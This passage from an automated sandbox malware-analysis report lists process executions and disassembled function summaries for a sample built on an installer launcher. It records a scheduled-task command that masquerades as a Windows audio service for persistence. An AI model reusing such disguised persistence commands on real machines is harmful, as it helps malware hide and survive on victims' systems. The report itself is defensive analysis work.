Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	157
Start time:	10:10:56
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	158
Start time:	10:10:56
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 7060, Parent PID: 2760

General

Target ID:	159
Start time:	10:10:58
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	160
Start time:	10:10:59
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	161
Start time:	10:10:59
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	19.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.1%
Total number of Nodes:	284
Total number of Limit Nodes:	4

Executed Functions

Function 00007FF6F9251C88 Relevance: 70.2, APIs: 32, Strings: 8, Instructions: 224
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00007FF6F9251D31
lstrlenA.KERNEL32 ref: 00007FF6F9251D41
lstrcatA.KERNEL32 ref: 00007FF6F9251D58
lstrcatA.KERNEL32 ref: 00007FF6F9251D65
wsprintfA.USER32 ref: 00007FF6F9251D7D
lstrcatA.KERNEL32 ref: 00007FF6F9251D89
lstrcatA.KERNEL32 ref: 00007FF6F9251D96
wsprintfA.USER32 ref: 00007FF6F9251DAF
lstrcatA.KERNEL32 ref: 00007FF6F9251DBB
lstrcatA.KERNEL32 ref: 00007FF6F9251DC8
wsprintfA.USER32 ref: 00007FF6F9251DE0
lstrcatA.KERNEL32 ref: 00007FF6F9251DEC
lstrcatA.KERNEL32 ref: 00007FF6F9251DF9
GetCurrentProcess.KERNEL32 ref: 00007FF6F9251E04
OpenProcessToken.ADVAPI32 ref: 00007FF6F9251E17
malloc.LIBCMT ref: 00007FF6F9251E35
GetTokenInformation.KERNELBASE ref: 00007FF6F9251E61
wsprintfA.USER32 ref: 00007FF6F9251E99
lstrcatA.KERNEL32 ref: 00007FF6F9251EA5
lstrcatA.KERNEL32 ref: 00007FF6F9251EB2
LocalFree.KERNEL32 ref: 00007FF6F9251EBD
free.LIBCMT ref: 00007FF6F9251EC6
MessageBoxA.USER32 ref: 00007FF6F9251EE3
ShellExecuteExA.SHELL32 ref: 00007FF6F9251F3B
GetLastError.KERNEL32 ref: 00007FF6F9251F45
lstrcpyA.KERNEL32 ref: 00007FF6F9251F5D
MsgWaitForMultipleObjects.USER32 ref: 00007FF6F9251FD7
GetExitCodeProcess.KERNEL32 ref: 00007FF6F9251FED
CloseHandle.KERNEL32 ref: 00007FF6F9252018

Strings

"__IRCT:%d", xrefs: 00007FF6F9251DA4
Could not start the setup, xrefs: 00007FF6F9251F56
open, xrefs: 00007FF6F9251EFD
"__IRTSS:%I64u", xrefs: 00007FF6F9251DD5
__IRAOFF:%I64u, xrefs: 00007FF6F9251D0E
"__IRSID:%s", xrefs: 00007FF6F9251E8E
@, xrefs: 00007FF6F9251F19
"__IRAFN:%s", xrefs: 00007FF6F9251D72

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: lstrcat$wsprintf$Process$Token$CloseCodeCurrentErrorExecuteExitFreeHandleInformationLastLocalMessageMultipleObjectsOpenShellWaitfreelstrcpylstrlenmalloc
String ID: "__IRAFN:%s"$"__IRCT:%d"$"__IRSID:%s"$"__IRTSS:%I64u"$@$Could not start the setup$__IRAOFF:%I64u$open
API String ID: 1484400040-1136106755
Opcode ID: a11ec726562670f7cfbc6e1c0cad0ad52d3108a06d3db1753afeefb41f425cf6
Instruction ID: 997049b0e1f8ea95288c8e1fbcb5bce29c269508411fc8805a5ddb4dbc30cedc
Opcode Fuzzy Hash: a11ec726562670f7cfbc6e1c0cad0ad52d3108a06d3db1753afeefb41f425cf6
Instruction Fuzzy Hash: 0AB15132A24B4296FB18DF29ED445A977A0FB44784F404135DA5EC3AACEF7CE159C740

Function 00007FF6F92519B4 Relevance: 63.2, APIs: 28, Strings: 8, Instructions: 153
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32 ref: 00007FF6F92519F5
GetTempPathA.KERNEL32 ref: 00007FF6F9251A11
lstrlenA.KERNEL32 ref: 00007FF6F9251A1E
lstrcpyA.KERNEL32 ref: 00007FF6F9251A48
lstrlenA.KERNEL32 ref: 00007FF6F9251A58
lstrcatA.KERNEL32 ref: 00007FF6F9251A74
wsprintfA.USER32 ref: 00007FF6F9251AA2
wsprintfA.USER32 ref: 00007FF6F9251ABA
DeleteFileA.KERNELBASE ref: 00007FF6F9251AC7
RemoveDirectoryA.KERNELBASE ref: 00007FF6F9251AD1
GetFileAttributesA.KERNELBASE ref: 00007FF6F9251ADB
CreateDirectoryA.KERNELBASE ref: 00007FF6F9251AEC
lstrcpyA.KERNEL32 ref: 00007FF6F9251AFB
SetCurrentDirectoryA.KERNELBASE ref: 00007FF6F9251B06
lstrcpyA.KERNEL32 ref: 00007FF6F9251B1C
CreateDirectoryA.KERNEL32 ref: 00007FF6F9251B29
SetCurrentDirectoryA.KERNEL32 ref: 00007FF6F9251B34
lstrcpyA.KERNEL32 ref: 00007FF6F9251B49
lstrlenA.KERNEL32 ref: 00007FF6F9251B59
lstrcatA.KERNEL32 ref: 00007FF6F9251B75
lstrcpyA.KERNEL32 ref: 00007FF6F9251B87
lstrcpyA.KERNEL32 ref: 00007FF6F9251B99
lstrcatA.KERNEL32 ref: 00007FF6F9251BAD
lstrcpyA.KERNEL32 ref: 00007FF6F9251BBF
lstrcatA.KERNEL32 ref: 00007FF6F9251BD3
GetDiskFreeSpaceA.KERNELBASE ref: 00007FF6F9251C16

Part of subcall function 00007FF6F925180C: lstrlenA.KERNEL32 ref: 00007FF6F9251840
Part of subcall function 00007FF6F925180C: lstrcatA.KERNEL32 ref: 00007FF6F925185A
Part of subcall function 00007FF6F925180C: lstrlenA.KERNEL32 ref: 00007FF6F9251863
Part of subcall function 00007FF6F925180C: SetCurrentDirectoryA.KERNEL32 ref: 00007FF6F92518B6
Part of subcall function 00007FF6F925180C: CreateDirectoryA.KERNEL32 ref: 00007FF6F92518C7

lstrcpyA.KERNEL32 ref: 00007FF6F9251C45
SetCurrentDirectoryA.KERNELBASE ref: 00007FF6F9251C57

Strings

%s%s_%d, xrefs: 00007FF6F9251A97
%s\irsetup.exe, xrefs: 00007FF6F9251AAC
lua5.1.dll, xrefs: 00007FF6F9251BC5
_ir_sf_temp, xrefs: 00007FF6F9251A8B
c:\temp, xrefs: 00007FF6F9251B10
irsetup.exe, xrefs: 00007FF6F9251B9F
You must have at least 2MB of free space on your TEMP drive!, xrefs: 00007FF6F9251C3E
Could not determine a temp directory name. Try running setup.exe /T:<Path>, xrefs: 00007FF6F9251B42

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: Directory$lstrcpy$Currentlstrcatlstrlen$Create$Filewsprintf$AttributesDeleteDiskFreePathRemoveSpaceTemp
String ID: %s%s_%d$%s\irsetup.exe$Could not determine a temp directory name. Try running setup.exe /T:<Path>$You must have at least 2MB of free space on your TEMP drive!$_ir_sf_temp$c:\temp$irsetup.exe$lua5.1.dll
API String ID: 3816071345-4167539251
Opcode ID: 099cdf72516c0135f1b5aa9ac0640ce91bc81016b26d1f710b104e2d1a9d3ea1
Instruction ID: 8e4e57b6a89d42fb88897148ef06a9440ad734f849b844cbc3eab4e92dc28496
Opcode Fuzzy Hash: 099cdf72516c0135f1b5aa9ac0640ce91bc81016b26d1f710b104e2d1a9d3ea1
Instruction Fuzzy Hash: 3F813B32628A8796FB18DF28EE841A9A360FB84754F804031D66EC25ACFFBCD54DC700

Function 00007FF6F9254260 Relevance: 4.5, APIs: 3, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE ref: 00007FF6F9254276
GetVersion.KERNEL32 ref: 00007FF6F9254288
HeapSetInformation.KERNEL32 ref: 00007FF6F92542A6

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: Heap$CreateInformationVersion
String ID:
API String ID: 3563531100-0
Opcode ID: c9ef4103069467bc3e1cbfb86f8ddfe3974583134bc7e4447d0960c5f6b28c4e
Instruction ID: 740bf7b41e4355f292edddef6a7232cc67c699931d449d91cbac59d56e980683
Opcode Fuzzy Hash: c9ef4103069467bc3e1cbfb86f8ddfe3974583134bc7e4447d0960c5f6b28c4e
Instruction Fuzzy Hash: 23E06D35A3AA9282FB886F59AD157752260FFC8340F800035E91EC2BDCEF7C9085C700

Function 00007FF6F92512AC Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 167
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_lopen.KERNEL32 ref: 00007FF6F92512D4
lstrcpyA.KERNEL32(?,00000000,?,00007FF6F9252066), ref: 00007FF6F92512F2
malloc.LIBCMT ref: 00007FF6F9251305
lstrcpyA.KERNEL32(?,00000000,?,00007FF6F9252066), ref: 00007FF6F925131D
free.LIBCMT ref: 00007FF6F925155E

Strings

Unable to open archive file, xrefs: 00007FF6F92512EB
Could not find total size indicator, xrefs: 00007FF6F92514E4
Could not find multi-segment indicator, xrefs: 00007FF6F9251436
Unable to allocate memory buffer, xrefs: 00007FF6F9251316
Could not find compression type indicator, xrefs: 00007FF6F9251494
Could not find data segment, xrefs: 00007FF6F9251545
Could not find setup size, xrefs: 00007FF6F9251528

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: lstrcpy$_lopenfreemalloc
String ID: Could not find compression type indicator$Could not find data segment$Could not find multi-segment indicator$Could not find setup size$Could not find total size indicator$Unable to allocate memory buffer$Unable to open archive file
API String ID: 2570182538-3063878580
Opcode ID: de2131382635f7d977f98a16866d3afccc9d4059693bd8aa3abc3801eb3ffcf4
Instruction ID: debf346796ee05bfda75e865b9c4e9e144cc071b03bb2fe0e144259eaa9326a4
Opcode Fuzzy Hash: de2131382635f7d977f98a16866d3afccc9d4059693bd8aa3abc3801eb3ffcf4
Instruction Fuzzy Hash: A481D462E28682A6F7288F2C9E805B86721FB457A4F144235D63BC75DDEF7CE956C300

Function 00007FF6F9251694 Relevance: 33.3, APIs: 14, Strings: 5, Instructions: 88
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE ref: 00007FF6F92516C0
_lread.KERNEL32(?,?,00000000,00007FF6F9252090), ref: 00007FF6F92516D5
lstrcpyA.KERNEL32(?,?,00000000,00007FF6F9252090), ref: 00007FF6F92516EB
malloc.LIBCMT ref: 00007FF6F9251705
SetFilePointer.KERNELBASE ref: 00007FF6F9251725
_lread.KERNEL32(?,?,00000000,00007FF6F9252090), ref: 00007FF6F9251739
_lcreat.KERNEL32 ref: 00007FF6F9251755
lstrcpyA.KERNEL32(?,?,00000000,00007FF6F9252090), ref: 00007FF6F925176D
_lwrite.KERNEL32 ref: 00007FF6F9251782
lstrcpyA.KERNEL32 ref: 00007FF6F925179C
_lclose.KERNEL32 ref: 00007FF6F92517A9
lstrcpyA.KERNEL32 ref: 00007FF6F92517C8
free.LIBCMT ref: 00007FF6F92517D6
lstrcpyA.KERNEL32 ref: 00007FF6F92517E8

Strings

Failed to alloc memory., xrefs: 00007FF6F92517E1
Failed to read Lua DLL, xrefs: 00007FF6F92517C1
Could not find Lua DLL file size, xrefs: 00007FF6F92516E4
Unable to write to Lua file., xrefs: 00007FF6F9251795
Unable to open Lua DLL file, xrefs: 00007FF6F9251766

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: lstrcpy$FilePointer_lread$_lclose_lcreat_lwritefreemalloc
String ID: Could not find Lua DLL file size$Failed to alloc memory.$Failed to read Lua DLL$Unable to open Lua DLL file$Unable to write to Lua file.
API String ID: 1949781031-3124031069
Opcode ID: e0a7c4d87d27c6d2e2f291eceafe50af2747c1decec1c281dc0ae7ec44b61c0c
Instruction ID: 99502b11d2c3d07caf2fe294e1d14588f4c59f7b33ba7b5e12fe6339d52e05fb
Opcode Fuzzy Hash: e0a7c4d87d27c6d2e2f291eceafe50af2747c1decec1c281dc0ae7ec44b61c0c
Instruction Fuzzy Hash: 43411B35A29A4293FB189F19EE844796361FB88794B404030DA2EC76EDEF7CE959C700

Function 00007FF6F9251000 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 119
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadCursorA.USER32 ref: 00007FF6F9251046
SetCursor.USER32 ref: 00007FF6F925104F
lstrlenA.KERNEL32 ref: 00007FF6F9251078
lstrcpyA.KERNEL32 ref: 00007FF6F925108C
lstrcpyA.KERNEL32 ref: 00007FF6F92510D3
lstrlenA.KERNEL32 ref: 00007FF6F92510FF
lstrlenA.KERNEL32 ref: 00007FF6F925111A
CompareStringA.KERNELBASE ref: 00007FF6F9251172
MessageBoxA.USER32 ref: 00007FF6F92511CF

Strings

Launcher Error, xrefs: 00007FF6F92511BB
/~DBG, xrefs: 00007FF6F9251153

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: lstrlen$Cursorlstrcpy$CompareLoadMessageString
String ID: /~DBG$Launcher Error
API String ID: 4294429971-151238577
Opcode ID: 0a9277867ff730e7b32f19f1c7990337ee8fc1156189be33327bbe5ebcf876f3
Instruction ID: e41990f99100ef8c719b84adc96f0339f0bde0395592056ca1bf8134384e53d4
Opcode Fuzzy Hash: 0a9277867ff730e7b32f19f1c7990337ee8fc1156189be33327bbe5ebcf876f3
Instruction Fuzzy Hash: B0514C32A29A8286FB348F28DD452F923A1FB44794F804136D56EC66EDEF7CE645C740

Function 00007FF6F9251578 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.LIBCMT ref: 00007FF6F9251598

Part of subcall function 00007FF6F9252AC0: _FF_MSGBANNER.LIBCMT ref: 00007FF6F9252AF0
Part of subcall function 00007FF6F9252AC0: HeapAlloc.KERNEL32 ref: 00007FF6F9252B15
Part of subcall function 00007FF6F9252AC0: _callnewh.LIBCMT ref: 00007FF6F9252B2E
Part of subcall function 00007FF6F9252AC0: _errno.LIBCMT ref: 00007FF6F9252B39
Part of subcall function 00007FF6F9252AC0: _errno.LIBCMT ref: 00007FF6F9252B44

SetFilePointer.KERNELBASE ref: 00007FF6F92515BB
_lread.KERNEL32(?,?,00000000,00007FF6F9252082), ref: 00007FF6F92515D1
_lcreat.KERNEL32 ref: 00007FF6F92515EB
lstrcpyA.KERNEL32(?,?,00000000,00007FF6F9252082), ref: 00007FF6F9251603
_lwrite.KERNEL32(?,?,00000000,00007FF6F9252082), ref: 00007FF6F925163B
lstrcpyA.KERNEL32(?,?,00000000,00007FF6F9252082), ref: 00007FF6F925165C
free.LIBCMT ref: 00007FF6F925166A
_lclose.KERNEL32 ref: 00007FF6F9251676

Strings

Unable to open setup file, xrefs: 00007FF6F92515FC
Failed to read setup engine, xrefs: 00007FF6F9251655

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: _errnolstrcpy$AllocFileHeapPointer_callnewh_lclose_lcreat_lread_lwritefreemalloc
String ID: Failed to read setup user$Unable to open setup file
API String ID: 3486659530-2055280143
Opcode ID: 91ec80f5b990ab4e0d7c3233ced67a738563a2ecac1238142aa3c5b2e95507a2
Instruction ID: c883f492c1d7cdbed597625110bc8fdbd70b5a80e74dad9271dac09d67ff547d
Opcode Fuzzy Hash: 91ec80f5b990ab4e0d7c3233ced67a738563a2ecac1238142aa3c5b2e95507a2
Instruction Fuzzy Hash: 4D318631A29A52C6F7149F29DD400B92361EB88B99F584130DE2FCB3DDEE7CE4458740

Function 00007FF6F9252B80 Relevance: 18.1, APIs: 12, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF6F9252B92
_FF_MSGBANNER.LIBCMT ref: 00007FF6F9252BFD
_FF_MSGBANNER.LIBCMT ref: 00007FF6F9252C28
_RTC_Initialize.LIBCMT ref: 00007FF6F9252C41
_amsg_exit.LIBCMT ref: 00007FF6F9252C55
GetCommandLineA.KERNEL32 ref: 00007FF6F9252C5A
__setargv.LIBCMT ref: 00007FF6F9252C73
_amsg_exit.LIBCMT ref: 00007FF6F9252C81
_amsg_exit.LIBCMT ref: 00007FF6F9252C94
_cinit.LIBCMT ref: 00007FF6F9252C9E
_amsg_exit.LIBCMT ref: 00007FF6F9252CA9
_wincmdln.LIBCMT ref: 00007FF6F9252CAE

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: _amsg_exit$CommandInfoInitializeLineStartup__setargv_cinit_wincmdln
String ID:
API String ID: 4082634633-0
Opcode ID: ae4916e3b04b3227ea643abd4b60dbc61f966aff544826d16c3a69032035fb30
Instruction ID: a39019773b4b6b10a3cee64fd8499bcab9bf4c6bf45883e5587683911dd4065e
Opcode Fuzzy Hash: ae4916e3b04b3227ea643abd4b60dbc61f966aff544826d16c3a69032035fb30
Instruction Fuzzy Hash: C9415D61E3C24386FB58AF6DAF523B96291AF80345F014035E63DC62DFFF6CA8408651

Function 00007FF6F925204C Relevance: 10.6, APIs: 7, Instructions: 57
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6F92512AC: _lopen.KERNEL32 ref: 00007FF6F92512D4
Part of subcall function 00007FF6F92512AC: lstrcpyA.KERNEL32(?,00000000,?,00007FF6F9252066), ref: 00007FF6F92512F2
Part of subcall function 00007FF6F92512AC: free.LIBCMT ref: 00007FF6F925155E

Sleep.KERNEL32 ref: 00007FF6F92520AE
DeleteFileA.KERNEL32 ref: 00007FF6F92520C4
DeleteFileA.KERNEL32 ref: 00007FF6F92520D1
RemoveDirectoryA.KERNEL32 ref: 00007FF6F92520DE

Part of subcall function 00007FF6F92519B4: GetCurrentDirectoryA.KERNEL32 ref: 00007FF6F92519F5
Part of subcall function 00007FF6F92519B4: GetTempPathA.KERNEL32 ref: 00007FF6F9251A11
Part of subcall function 00007FF6F92519B4: lstrlenA.KERNEL32 ref: 00007FF6F9251A1E
Part of subcall function 00007FF6F92519B4: lstrcpyA.KERNEL32 ref: 00007FF6F9251A48
Part of subcall function 00007FF6F92519B4: lstrlenA.KERNEL32 ref: 00007FF6F9251A58
Part of subcall function 00007FF6F92519B4: lstrcatA.KERNEL32 ref: 00007FF6F9251A74
Part of subcall function 00007FF6F92519B4: wsprintfA.USER32 ref: 00007FF6F9251AA2
Part of subcall function 00007FF6F92519B4: wsprintfA.USER32 ref: 00007FF6F9251ABA
Part of subcall function 00007FF6F92519B4: DeleteFileA.KERNELBASE ref: 00007FF6F9251AC7
Part of subcall function 00007FF6F92519B4: RemoveDirectoryA.KERNELBASE ref: 00007FF6F9251AD1
Part of subcall function 00007FF6F92519B4: GetFileAttributesA.KERNELBASE ref: 00007FF6F9251ADB
Part of subcall function 00007FF6F92519B4: CreateDirectoryA.KERNELBASE ref: 00007FF6F9251AEC
Part of subcall function 00007FF6F92519B4: lstrcpyA.KERNEL32 ref: 00007FF6F9251AFB
Part of subcall function 00007FF6F92519B4: SetCurrentDirectoryA.KERNELBASE ref: 00007FF6F9251B06
Part of subcall function 00007FF6F92519B4: lstrcpyA.KERNEL32 ref: 00007FF6F9251B1C
Part of subcall function 00007FF6F92519B4: CreateDirectoryA.KERNEL32 ref: 00007FF6F9251B29
Part of subcall function 00007FF6F92519B4: SetCurrentDirectoryA.KERNEL32 ref: 00007FF6F9251B34
Part of subcall function 00007FF6F92519B4: lstrcpyA.KERNEL32 ref: 00007FF6F9251B49
Part of subcall function 00007FF6F92519B4: lstrlenA.KERNEL32 ref: 00007FF6F9251B59
Part of subcall function 00007FF6F92519B4: lstrcatA.KERNEL32 ref: 00007FF6F9251B75
Part of subcall function 00007FF6F92519B4: lstrcpyA.KERNEL32 ref: 00007FF6F9251B87

MoveFileExA.KERNEL32 ref: 00007FF6F92520EC
MoveFileExA.KERNEL32 ref: 00007FF6F92520FF
MoveFileExA.KERNEL32 ref: 00007FF6F9252112

Part of subcall function 00007FF6F9251578: malloc.LIBCMT ref: 00007FF6F9251598
Part of subcall function 00007FF6F9251578: SetFilePointer.KERNELBASE ref: 00007FF6F92515BB
Part of subcall function 00007FF6F9251578: _lread.KERNEL32(?,?,00000000,00007FF6F9252082), ref: 00007FF6F92515D1
Part of subcall function 00007FF6F9251578: _lcreat.KERNEL32 ref: 00007FF6F92515EB
Part of subcall function 00007FF6F9251578: lstrcpyA.KERNEL32(?,?,00000000,00007FF6F9252082), ref: 00007FF6F9251603
